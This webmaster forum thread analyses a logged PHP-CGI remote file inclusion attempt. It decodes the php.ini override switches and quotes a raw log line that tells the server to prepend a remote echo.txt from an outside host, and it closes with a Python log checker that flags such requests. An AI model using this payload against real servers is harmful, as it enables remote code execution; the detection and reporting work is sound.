keyplyr

msg:4519870 | 9:22 am on Nov 17, 2012 (gmt 0) |
This is obviously a hack attempt, trying to inject a script. I wonder if you sent a complaint to SPRINT w/ log snippet whether they'd take any action?
|
iamzippy

msg:4519871 | 9:40 am on Nov 17, 2012 (gmt 0) |
It's a variant of the Remote File Inclusion exploit, attempting to pull in a bad file named 'echo.txt' from port 8080 on a server in Seoul, Korea (211.172.112.n:8080). The Korean organization is 'Iosystem' (211.172.112.0/23), who live at the unfortunately-named 'Sukchon-Dong, Songpa-gu'. Go figure.
|
lucy24

msg:4519875 | 10:17 am on Nov 17, 2012 (gmt 0) |
It's a little more intelligible if you decode:

-dsafe_mode=Off
+-ddisable_functions=NULL
+-dallow_url_fopen=On
+-dallow_url_include=On
+-dauto_prepend_file=http://{filename as identified by iamzippy, above}

I suppose Dong in Korean means something utterly boring like Smith or Street. (I asked g###, but the translator played dumb because it wasn't in Korean script.)

:: off to see if URL is duly mentioned in htaccess ::
|
Ken_S

msg:4520067 | 12:03 pm on Nov 18, 2012 (gmt 0) |
Thanks everyone, I've been lurking around for about 3 years now and I have learned a lot from you folks - your expertise has been a great help.

Ken
|
Ken_S

msg:4522429 | 10:03 pm on Nov 25, 2012 (gmt 0) |
Different IP - almost same Request & UA

67.181.147.xxx - - [25/Nov/2012:06:48:27 -0800] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+ -dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F50.22.136.150%3A8080%2Fecho.txt HTTP/1.1" 403 3195 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"
|
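A log check for the request pattern discussed in this thread, as an added example that is not part of any post above: it URL-decodes the query string of each access-log entry the way lucy24 did by hand and reports any `-d` php.ini overrides it finds. The function name, the list of watched directives and the sample log lines (documentation-range addresses) are assumptions constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Request target inside a combined-format access log entry. The lazy (.+?)
# tolerates a stray space inside the target, as in the line logged on 25 Nov.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
# php.ini overrides written as command-line style switches: -dname=value
SWITCH_RE = re.compile(r'(?:^|\s)-d\s*([A-Za-z_.]+)=(\S*)')
# Directives the requests in this thread try to change (assumed watch list).
WATCHED = {"safe_mode", "disable_functions", "allow_url_fopen",
           "allow_url_include", "auto_prepend_file", "auto_append_file"}

def find_ini_overrides(log_line):
    """Return {directive: value} for watched -d switches in the query string."""
    m = REQUEST_RE.search(log_line)
    if not m or "?" not in m.group(1):
        return {}
    query = m.group(1).split("?", 1)[1]
    decoded = unquote_plus(query)          # %3d -> '=', '+' -> ' '
    # Ordinary parameters start with a name; this pattern starts with a switch.
    if not decoded.lstrip().startswith("-"):
        return {}
    return {k: v for k, v in SWITCH_RE.findall(decoded) if k in WATCHED}

# Constructed sample entries (not taken from a real log).
SAMPLE = [
    '198.51.100.23 - - [25/Nov/2012:06:48:27 -0800] "GET /index.php?'
    '-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+'
    '-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F'
    '198.51.100.7%3A8080%2Fecho.txt HTTP/1.1" 403 3195 "-" "Mozilla/4.0"',
    '203.0.113.9 - - [25/Nov/2012:06:50:01 -0800] '
    '"GET /index.php?id=5&sort=-date HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for entry in SAMPLE:
        hits = find_ini_overrides(entry)
        if hits:
            # Report the client and the remote file it tried to prepend.
            print(entry.split()[0], hits.get("auto_prepend_file"), sorted(hits))
```

The value reported for `auto_prepend_file` is the remote host worth adding to a block list or an abuse report, alongside the client address.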